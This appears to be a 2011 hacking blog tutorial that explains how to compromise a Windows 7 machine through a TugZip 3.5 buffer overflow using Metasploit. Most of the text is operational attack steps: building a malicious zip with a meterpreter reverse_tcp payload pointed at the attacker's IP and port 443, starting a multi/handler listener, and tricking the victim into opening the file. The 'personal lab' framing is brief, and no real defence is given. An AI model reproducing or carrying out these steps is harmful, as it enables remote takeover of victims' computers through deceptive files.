Hacking Windows 7 SP1 via TugZip 3.5 Buffer Overflow Vulnerability(Zeroday) ( by heykhend )

 
Type : Tutorial

Level : Medium

Attacker O.S : Backtrack 5 R1

Victim O.S : Windows 7 SP1

Tested Vulnerable Application : TugZip 3.5

Exploit Credit : Stefan Marin, Lincoln, TecR0c, mr_me

This tutorial I wrote after surfing around metasploit and then found this exploit .
According to metasploit.com about this exploit :
This module exploits a stack-based buffer overflow vulnerability in the latest version 3.5 of TugZip archiving utility. In order to trigger the vulnerability, an attacker must convince someone to load a specially crafted zip file with TugZip by double click or file open. By doing so, an attacker can execute arbitrary code as the victim user.
Don't wait too long, let's try this in your personal lab by using virtual machine.

Requirements :

1. TugZip 3.5
Download from Mediafire.com

2. TugZip Exploit (press CTRL + click my affiliations box to view the download link below)

3. Metasploit Framework

Step By Step :

Attacker IP Address : 192.168.8.93

Victim IP Address : 192.168.8.91

1. Download TugZip from the mediafire link above and install it in victim computer(testing purposes)
2. Open Metasploit console by running msfconsole command and then update it first using msfupdate command to update the library. If you didn't have internet connection to update the library, you can download the exploit above and then put it in /pentest/exploits/framework/modules/exploit/windows/fileformat/
Use the exploit and then set up the payload(see picture below)

3. The next step you need to configure the needed switch in this exploit to match your needs. To view all available switch just run show options command.

Info :

set filename h0T-clipS.zip --> set up your desired filename for the malicious file

set lhost 192.168.8.93 --> set up the local address to connect back to payload when exploit successfully triggered

set lport 443 --> our local port to receive connection from victim

exploit --> generate the malicious file with payload

/root/.msf4/data/exploits/h0T-clipS.zip --> the malicious file stored in this location

4. The next step we need to set up a listener to handle reverse connection from our exploit(if it's successfully triggered)

Info :

use exploit/multi/handler --> set up handler to handle connection to our machine

set payload/windows/meterpreter/reverse_tcp --> make this same with the payload we've already been set up above

set lhost 192.168.8.93 --> make this same with the ip we've already been set up above

set lport 443 --> make this same with the local port we've already been set up above

exploit --> start listen for incoming connection

5. After everything has been set up, we need to send the malicious file in step 3 to victim and make sure victim opened that file. After victim opened our malicious file, our metasploit console will have an active session of victim system.

Pwn3D!!

Countermeasures :

1. Until I'm wrote this tutorial(2011-10-15) the status still zeroday a.k.a no cure.
Hope it's useful
by admin : heykhend